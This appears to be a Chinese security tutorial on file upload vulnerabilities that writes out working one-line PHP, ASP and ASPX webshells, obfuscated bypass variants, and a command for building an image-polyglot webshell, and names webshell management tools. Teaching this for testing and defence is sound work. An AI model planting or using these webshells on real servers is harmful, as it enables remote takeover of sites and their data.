9.文件上传漏洞基础

简介: 文件上传漏洞通常由于网页代码中的文件上传路径变量过滤不严造成的,如果文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,攻击者可通过 Web 访问的目录上传任意文件,包括网站后门文件(webshell),进而远程控制网站服务器。

webshell介绍
Webshell就是以asp、php、jsp等网页文件形式存在的一种代码/命令执行环境,也可以称为主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一
种网页后门个代码文件,通过网址访问,便可进行很多日常操作,极犬地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,达到控制网站服务器的目的。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器的WEB目录下的正常网页文件混在一起,然后就可以使用浏览器来访asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。

webshee的优点:
Webshel最大的优点就是可以穿越防火墙,由于与被控制的服务器或远程主机交换的数据都是通过80端口传递的,因此不会被防火墙拦截。并且使用Webshell一般不会在系统日志中留下记录,只会在网站的Web日志(apache的access.log),中留下一些数据提交记录,没有经验的管理员是很难看出入侵痕迹的。
一句话木马

● 一句话木木马
代码段 一行代码 使用场景多 可以单独生成 安全性高 隐秘性强 可以变形免杀

image.png

<?php eval($_POST['rany']);?>

asp一句话木马
<%execute (request("value"))%>
php一句话木马

<?php @eval($_POST[ 'value' ]);?>
注意:@隐藏报错信息
aspx一句话木马
<%@ Page Languaget="Jscript"%> <%eval(Request.Item["value"])%>

木马变形
1.函数替换
·php中除了eval,还有其他函数也可以执行代码,比如assert函数 ·命令执行函数system、passthru、exec、shell exec等
<?php assert($_POST[ 'value' ]);?>

2.双变量绕过
<?php $_POST['a']($_POST['b'])?>
提交:a=assert&b=phpinfo()

3.字符串变形绕过

4.定义函数绕过
5.回调函数绕过
6.类绕过
7.编码绕过
8.特殊字符干扰绕过
9.无字符特征码绕过

● 图片马

🔲 CMD制作
copy 1.jpg/b + 2.php/a 3.jpg
注意:b表示二进制 a表示asscii文件 3.jpg即为图片马

🔲 图片属性——>信息信息 ——>版权

image.png

结合文件包含 上传webshell

🔲 工具制作图片马 —— C32
010 edi

● 大马
体积大 功能全 会调用关键函数 以代码加密的形式进行隐藏

管理工具使用
蚁剑

冰蝎

哥斯拉

中国菜刀

相关文章
|
安全 Java 程序员
Web安全性测试系列(三)文件上传漏洞核心原理详解
Web安全性测试系列(三)文件上传漏洞核心原理详解
149 0
|
3月前
|
安全 关系型数据库 MySQL
Web安全-任意文件下载漏洞
Web安全-任意文件下载漏洞
181 5
|
2月前
|
安全 网络协议 Shell
文件上传漏洞(七)XISE寄生虫Weevely学习
文件上传漏洞(七)XISE寄生虫Weevely学习
|
2月前
|
安全 Shell 网络安全
文件上传漏洞(四)edjpgcom
文件上传漏洞(四)edjpgcom
|
2月前
|
安全 Java Linux
文件上传漏洞(三)Cknife
文件上传漏洞(三)Cknife
|
2月前
|
开发框架 安全 JavaScript
文件上传漏洞(五)一句话合集
文件上传漏洞(五)一句话合集
|
2月前
|
存储 安全
文件上传漏洞(六)一句话马图片
文件上传漏洞(六)一句话马图片
|
5月前
|
安全 JavaScript API
文件上传漏洞——绕过
绕过客户端检测(JS检测) 绕过服务端检测(MIME类型检测、文件后缀检测、文件内容检测)
122 1
|
5月前
|
SQL 监控 安全
探索网络安全:浅析文件上传漏洞
网络安全是一场没有硝烟的战争,它要求我们时刻保持警惕,不断学习与适应。无论是采用强密码、数据加密,还是定期更新软件、安装安全软件,每一项措施都是我们构建网络安全防线的基石。同时,我们也应意识到,技术手段之外,提升安全意识、培养安全习惯同样至关重要。
|
5月前
|
开发框架 安全 JavaScript
文件上传漏洞
文件上传漏洞允许攻击者上传可执行脚本,获取服务器控制权。常见原因包括服务器配置不当、验证不严等。防御措施包括设置不可执行的上传目录、严格文件类型检查、随机化文件名和路径,以及使用独立的文件服务器域名。WebShell是上传的恶意脚本,常用于控制网站服务器。
95 0